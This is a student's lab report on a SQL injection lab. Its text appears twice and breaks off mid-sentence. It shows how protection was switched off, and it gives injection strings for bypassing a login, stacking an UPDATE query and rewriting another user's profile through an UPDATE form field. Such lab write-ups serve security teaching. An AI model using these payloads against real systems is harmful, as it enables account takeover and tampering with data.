Lab10 SQL Injection Attack Lab
Lab10 SQL Injection Attack Lab
Yukui Ye
SUID: 439644268
Task1: SQL Injection Attack on SELECT Statements
Setup: Turn off build-in SQL injection protection
Set magic_quotes_gpc value to ‘off’ in file /etc/php5/apache2/php.ini in order to turn it off.
Then restart it:
Task1.1: Log into another person’s account without knowing the password
Check the login part code to see how it login works.
Following is the PHP codes run at server side.
From the above code, we can tell how server send query to Database. But we can still guess to login without knowing the user’s passward by typing “bob’);-- “( space after the comment’--’ )
By doing above thing, we successfully log into user’s account.
Task1.2: Find a way to modify the database.
We can use semicolon to finish a SQL statement and then append update/insert/delete statement right after semicolon in order to modify the database by SQL injection. Therefore the database will receive two statements at the same time. I tried the following sentence in the log in window.
peter’);update user set company=’SQLinjection’ where id=4;--
It all turned out to be failed as the screenshot showed below.
REASON: First check the PHP codes again:
By checking the code, we can see that it uses mysql_query to send statement to database. But mysql_query can only send one query to database at one time to run. Multiple queries are not supported. Therefore, it not allow to select and update in the same time when using mysql_query.
Task2: SQL Injection on UPDATE Statements
Step1:The main idea is the same as task1, which is to achieve the goal by using‘ -- ’to comment statement, and add our own where condition. First, we login as peter(peter’s original profile is nothing), change the user name to bob, and add “ SU’where ID=3;-- “at the field of company, AND email information as well as phone number.
After we click send buttom, go to peter’s profile, still nothing just as original one.
Then we login as bob to check bob profile, we
Yukui Ye
SUID: 439644268
Task1: SQL Injection Attack on SELECT Statements
Setup: Turn off build-in SQL injection protection
Set magic_quotes_gpc value to ‘off’ in file /etc/php5/apache2/php.ini in order to turn it off.
Then restart it:
Task1.1: Log into another person’s account without knowing the password
Check the login part code to see how it login works.
Following is the PHP codes run at server side.
From the above code, we can tell how server send query to Database. But we can still guess to login without knowing the user’s passward by typing “bob’);-- “( space after the comment’--’ )
By doing above thing, we successfully log into user’s account.
Task1.2: Find a way to modify the database.
We can use semicolon to finish a SQL statement and then append update/insert/delete statement right after semicolon in order to modify the database by SQL injection. Therefore the database will receive two statements at the same time. I tried the following sentence in the log in window.
peter’);update user set company=’SQLinjection’ where id=4;--
It all turned out to be failed as the screenshot showed below.
REASON: First check the PHP codes again:
By checking the code, we can see that it uses mysql_query to send statement to database. But mysql_query can only send one query to database at one time to run. Multiple queries are not supported. Therefore, it not allow to select and update in the same time when using mysql_query.
Task2: SQL Injection on UPDATE Statements
Step1:The main idea is the same as task1, which is to achieve the goal by using‘ -- ’to comment statement, and add our own where condition. First, we login as peter(peter’s original profile is nothing), change the user name to bob, and add “ SU’where ID=3;-- “at the field of company, AND email information as well as phone number.
After we click send buttom, go to peter’s profile, still nothing just as original one.
Then we login as bob to check bob profile, we